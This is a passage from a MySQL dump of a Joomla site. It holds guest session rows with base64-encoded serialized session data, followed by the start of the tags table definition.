'eade3b9db3b83cde671407b5f95a5c00',0,1,1676280909,'joomla|s:884:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjI4MDkwODtzOjQ6Imxhc3QiO2k6MTY3NjI4MDkwODtzOjM6Im5vdyI7aToxNjc2MjgwOTA4O31zOjU6InRva2VuIjtzOjMyOiJFVm5SeTJsQVZ6eFpBeVY2cU8zRzdjYmxDQjJYcmF1dSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjQyOiImcmV0dXJuPWFIUjBjSE02THk5dFlXeGxhSFZ6TG1sdUxuVmhMejglM0QiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),(_binary 'f064d02b063735237bc574924bb01ab9',0,1,1676526588,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjUyNjU4ODtzOjQ6Imxhc3QiO2k6MTY3NjUyNjU4ODtzOjM6Im5vdyI7aToxNjc2NTI2NTg4O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'f1ffd24676d1287f3bd8cc1b4da3f14c',0,1,1676406936,'joomla|s:996:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjQwNjkzNjtzOjQ6Imxhc3QiO2k6MTY3NjQwNjkzNjtzOjM6Im5vdyI7aToxNjc2NDA2OTM2O31zOjU6InRva2VuIjtzOjMyOiJnOVUxQ1Y3b1VBRHJrZ0x2ejdoWGQwclpCNXpLM0RiOCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjEyNjoiJnJldHVybj1hSFIwY0hNNkx5OXRZV3hsYUhWekxtbHVMblZoTDJsdVpHVjRMbkJvY0M5b2IyeDFZbmt2Y0c5dFpYSmhibk5yYVMxa2RYUjVjMmhwTHpJME9UUXRjMjVwWkdGdWIyc3RkaTF1YjNadmJYVXRjbTkwYzJrJTJGIjt9fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";',0,''),(_binary 'f4165311e35dec16295d21ed787717e4',0,1,1676110823,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjExMDgyMztzOjQ6Imxhc3QiO2k6MTY3NjExMDgyMztzOjM6Im5vdyI7aToxNjc2MTEwODIzO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'f42b52883fd18d183175695db657b9ce',0,1,1676443428,'joomla|s:1080:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjQ0MzQyODtzOjQ6Imxhc3QiO2k6MTY3NjQ0MzQyODtzOjM6Im5vdyI7aToxNjc2NDQzNDI4O31zOjU6InRva2VuIjtzOjMyOiJ1WkVZNFVlZ2dZRkpLWmdFVGprOEdyZ095emIxdDl3MyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjE4ODoiJnJldHVybj1hSFIwY0hNNkx5OXRZV3hsYUhWekxtbHVMblZoTDJsdVpHVjRMbkJvY0M5ellXUnBkbTU1ZEhOMGRtOHZlbUZ6YjJKNUxYcGhhMmg1YzNSMUx6Z3RibTkyYVc1cExUSXZNalEyT1MxMkxYcG9hWFJ2YldseWMydHBhaTF2WW14aGMzUnBMWFYwZG05eVpXNXZMVGd0ZG1saWIzSmphR2xyYUMxdmEzSjFaMmwyUHclM0QlM0QiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),(_binary 'f5aa132ffb66b7adc3d826bd1c4e8bef',0,1,1676070242,'joomla|s:884:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjA3MDI0MjtzOjQ6Imxhc3QiO2k6MTY3NjA3MDI0MjtzOjM6Im5vdyI7aToxNjc2MDcwMjQyO31zOjU6InRva2VuIjtzOjMyOiJrdDFNVzIzTko4bHB6NWJEZHNYU2ZZMlV6WVlYQ0h6YSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjQyOiImcmV0dXJuPWFIUjBjSE02THk5dFlXeGxhSFZ6TG1sdUxuVmhMejglM0QiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),(_binary 'f7ae05c4881aee7d391d4f1286cdfd12',0,1,1676159384,'joomla|s:884:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjE1OTM4MztzOjQ6Imxhc3QiO2k6MTY3NjE1OTM4MztzOjM6Im5vdyI7aToxNjc2MTU5MzgzO31zOjU6InRva2VuIjtzOjMyOiI1VWFyVWU5dGk5RDVsNUZ6MkFUV2pzS2RCM0FMVVlibyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjQyOiImcmV0dXJuPWFIUjBjSE02THk5dFlXeGxhSFZ6TG1sdUxuVmhMejglM0QiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),(_binary 'f826b9e2d4f3724cd9cd95c5a9851d95',0,1,1676526568,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjUyNjU2ODtzOjQ6Imxhc3QiO2k6MTY3NjUyNjU2ODtzOjM6Im5vdyI7aToxNjc2NTI2NTY4O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'f8484a8ab2168d792c331fd0854e0782',0,1,1676526608,'joomla|s:884:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjUyNjYwODtzOjQ6Imxhc3QiO2k6MTY3NjUyNjYwODtzOjM6Im5vdyI7aToxNjc2NTI2NjA4O31zOjU6InRva2VuIjtzOjMyOiJ6OFdiM2g2VWVYWmxUc2t6M3B5NDVERElMdXZKVFkxNCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjQyOiImcmV0dXJuPWFIUjBjSE02THk5dFlXeGxhSFZ6TG1sdUxuVmhMejglM0QiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),(_binary 'f8edb6eaf3438df14f8c446e76abab49',0,1,1676426954,'joomla|s:892:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjQyNjk1NDtzOjQ6Imxhc3QiO2k6MTY3NjQyNjk1NDtzOjM6Im5vdyI7aToxNjc2NDI2OTU0O31zOjU6InRva2VuIjtzOjMyOiJtYzlGanJ3ZXNrZGNsWEpVeFRyelBFaWtZajFqejZWWCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjUwOiImcmV0dXJuPWFIUjBjSE02THk5dFlXeGxhSFZ6TG1sdUxuVmhMMmh2YkhWaWVUOCUzRCI7fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'fb5f7cba57789104b14bea52f79d2e50',0,1,1676526580,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjUyNjU4MDtzOjQ6Imxhc3QiO2k6MTY3NjUyNjU4MDtzOjM6Im5vdyI7aToxNjc2NTI2NTgwO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'fb82e2d0b8dfbaa5ea7b1f638393a47c',0,1,1676280928,'joomla|s:884:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjI4MDkyNztzOjQ6Imxhc3QiO2k6MTY3NjI4MDkyNztzOjM6Im5vdyI7aToxNjc2MjgwOTI3O31zOjU6InRva2VuIjtzOjMyOiJOVTVLQW1SUW1pNnpZYjlOb05yM3RUV2w4RklvNk4zeSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjQyOiImcmV0dXJuPWFIUjBjSE02THk5dFlXeGxhSFZ6TG1sdUxuVmhMejglM0QiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),(_binary 'fbefec8f51815cd96c93ffc3c2205f94',0,1,1676390899,'joomla|s:1012:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjM5MDg5ODtzOjQ6Imxhc3QiO2k6MTY3NjM5MDg5ODtzOjM6Im5vdyI7aToxNjc2MzkwODk4O31zOjU6InRva2VuIjtzOjMyOiJqYmdzMzM2QkNLOWlWWWVMNmkwV0VCdk9jelh1TWRlbyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoyOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjQ2OiImcmV0dXJuPWFIUjBjSE02THk5M2QzY3ViV0ZzWldoMWN5NXBiaTUxWVM4JTJGIjt9czoxMzoiY29tX2luc3RhbGxlciI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo3OiJtZXNzYWdlIjtzOjA6IiI7czoxNzoiZXh0ZW5zaW9uX21lc3NhZ2UiO3M6MDoiIjt9fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";',0,''),(_binary 'fd8b2f744ee79f135b64665eeda62741',0,1,1676526687,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjUyNjY4NztzOjQ6Imxhc3QiO2k6MTY3NjUyNjY4NztzOjM6Im5vdyI7aToxNjc2NTI2Njg3O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'fed9a1a3fb93321b0635d0b363a07edb',0,1,1676393165,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjM5MzE2NDtzOjQ6Imxhc3QiO2k6MTY3NjM5MzE2NDtzOjM6Im5vdyI7aToxNjc2MzkzMTY0O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'fedc3951c48e8e848bd625cc690b46a3',0,1,1676526591,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjUyNjU5MTtzOjQ6Imxhc3QiO2k6MTY3NjUyNjU5MTtzOjM6Im5vdyI7aToxNjc2NTI2NTkxO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'ff51933231f9cdce8cda1b7598be1dd7',0,1,1676526590,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjUyNjU5MDtzOjQ6Imxhc3QiO2k6MTY3NjUyNjU5MDtzOjM6Im5vdyI7aToxNjc2NTI2NTkwO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'ff9c650ebb0c4746e27dfb379e2a2b5d',0,1,1676526640,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjUyNjY0MDtzOjQ6Imxhc3QiO2k6MTY3NjUyNjY0MDtzOjM6Im5vdyI7aToxNjc2NTI2NjQwO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,'');
/*!40000 ALTER TABLE `fw3gt_session` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_tags`
--

DROP TABLE IF EXISTS `fw3gt_tags`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_tags` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `level` int(10) unsigned NOT NULL DEFAULT '0',
  `path` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
